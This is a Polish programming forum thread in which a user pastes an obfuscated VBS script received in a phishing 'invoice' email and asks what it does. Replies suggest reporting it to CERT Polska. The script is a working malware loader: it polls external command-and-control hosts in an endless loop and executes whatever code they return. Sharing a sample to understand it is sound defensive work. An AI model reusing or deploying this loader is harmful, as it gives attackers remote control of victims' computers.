• Najnowsze pytania
  • Bez odpowiedzi
  • Zadaj pytanie
  • Kategorie
  • Tagi
  • Zdobyte punkty
  • Ekipa ninja
  • IRC
  • FAQ
  • Regulamin
  • Książki warte uwagi

Skrypt w VBS - co on robi?

VPS Starter Arubacloud
0 głosów
949 wizyt
pytanie zadane 21 września 2018 w Visual Basic przez Jiin Obywatel (1,390 p.)
zmienione kategorie 21 września 2018 przez Eryk Andrzejewski

Witam serdecznie

Dostałem ostatnio na maila 'fakturę' od zapewne jakiegoś Pana, który wykorzystując nazwę jakiejś firmy próbuje zawirusować komputer w innych firmach. Załącza do maila plik VBS spakowany w .rar. No i jestem ciekaw co ten plik robi. Skrypt:

dim sss, DuriOAdaMyArray, MadriOdaKadurls, TaniPoldsAhttpsd, PerepravaAdzz, CSKAfkkk, PiroGinaAdands
dim DreMosAdQQSurls, LudoViKaate, PiPloVirasdate
PiPloVirasdate = null
PerepravaAdzz = "773335550757"

Function  PilOsaAdQQFSkip()
  On Error Resume Next
	KipoloasAdMinsa()
    POOOPPAQMessage(PiPloVirasdate)
	CSKAfkkk = Array("", "", "")
End Function

Function  TexasSFAxdA()
    On Error Resume Next
   Set TaniPoldsAhttpsd = CreateObject("Microsoft.XMLHTTP")
	TaniPoldsAhttpsd.Open "GET", "https://www.goooglwas.freesaf/111/222", False
    TaniPoldsAhttpsd.Send	

    If (TaniPoldsAhttpsd.Status = 200) Then    
		TradionsiksMase()
    Else      
		PinachetoSHello() 
		
		
	End If

	
End Function

Function  TradionsiksMase()
	dim dododsex
	dododsex = 0
    dododsex = FormatDateTime(Now, vbLongTime) 
	TradionsiksMase(dododsex)
End Function

Function  PoloDoadsloas()
  On Error Resume Next
    randomize
    PiroGinaAdands = int(rnd*2) + 1
	DreMosAdQQSurls = "http://"+CSKAfkkk(PiroGinaAdands)+"/ip.php?number=753246&opt=" 
    PoloDoadsloas(DreMosAdQQSurls)
End Function


Function  PoloDoadsloas2()
	Dim Farujuylsd
 Farujuylsd = PoloDoadsloas()
End Function

Function  PoloDoadsloas3()
	PoloDoadsloas2()
End Function

Function  PoloDoadsloas4()
	PoloDoadsloas3()
End Function

Function  KipoloasAdMinsa()
	CSKAfkkk(2) = "192.3.204.232"
	CSKAfkkk(1) = "servesmailerprogres.science"
	PoloDoadsloas4()
End Function

Function PilotyUsaTest()
     	 TerpiloaAReset()
End Function

Function  TerpiloaAReset()
    PerepravaAdzz = CStr(PerepravaAdzz + 1) 
End Function

Function  GreeceFaxPc()
  On Error Resume Next
   While true
       WScript.Sleep 7000
    Call PilOsaAdQQFSkip()
   Wend
End Function

Function  DomOsaAGoo(responseText)
    On Error Resume Next
	DuriOAdaMyArray = Array(22, 11, 00, 22,43, 34, 2341, responseText)
	TexasSFAxdA()
End Function

Function  POOOPPAQMessage(lolosaddate)
    On Error Resume Next 
    dim wertyUsdreq, streddy
    Set wertyUsdreq = createobject("Microsoft.XMLHTTP")
    wertyUsdreq.Open "GET", lolosaddate, False
    wertyUsdreq.Send
            WScript.Sleep 100	
			streddy = wertyUsdreq.responseText
	DomOsaAGoo(streddy)
End Function

Function LiveAdTest()
        PiPloVirasdate = ""
	PiPloVirasdate =+ DreMosAdQQSurls  + PerepravaAdzz + "&" +  "yousa"		
End Function

Function GameSSTest()
    PilotyUsaTest()      
	LiveAdTest()
End Function

Function PinachetoSHello()
	GameSSTest()
         Execute "" + DuriOAdaMyArray(7) + "" 
End Function



Call GreeceFaxPc()

 

2 odpowiedzi

+2 głosów
odpowiedź 21 września 2018 przez bimbrownik Mądrala (5,180 p.)

Możesz zgłosić to do analizy CERT Polska jako incydent zagrożenia bezpieczeństwa. Link

–2 głosów
odpowiedź 21 września 2018 przez profesorek96 Szeryf (91,420 p.)
Ciekawe ciekawe. Chyba nauczę się podstaw VBS bo to jest ciekawy temat.

Podobne pytania

0 głosów
1 odpowiedź 866 wizyt
pytanie zadane 19 listopada 2018 w Bezpieczeństwo, hacking przez Michał Samolewski Bywalec (2,240 p.)
0 głosów
0 odpowiedzi 130 wizyt
pytanie zadane 28 listopada 2016 w Visual Basic przez rafi-vir Nowicjusz (140 p.)
0 głosów
0 odpowiedzi 202 wizyt
pytanie zadane 25 marca 2016 w Visual Basic przez Gazunek Nowicjusz (160 p.)

92,770 zapytań

141,695 odpowiedzi

320,518 komentarzy

62,107 pasjonatów

Motyw:

Akcja Pajacyk

Pajacyk od wielu lat dożywia dzieci. Pomóż klikając w zielony brzuszek na stronie. Dziękujemy! ♡

Oto polecana książka warta uwagi.
Pełną listę książek znajdziesz tutaj.

Akademia Sekuraka

Niedawno wystartował dodruk tej świetnej, rozchwytywanej książki (około 940 stron). Mamy dla Was kod: pasja (wpiszcie go w koszyku), dzięki któremu otrzymujemy 10% zniżki - dziękujemy zaprzyjaźnionej ekipie Sekuraka za taki bonus dla Pasjonatów! Książka to pierwszy tom z serii o ITsec, który łagodnie wprowadzi w świat bezpieczeństwa IT każdą osobę - warto, polecamy!

...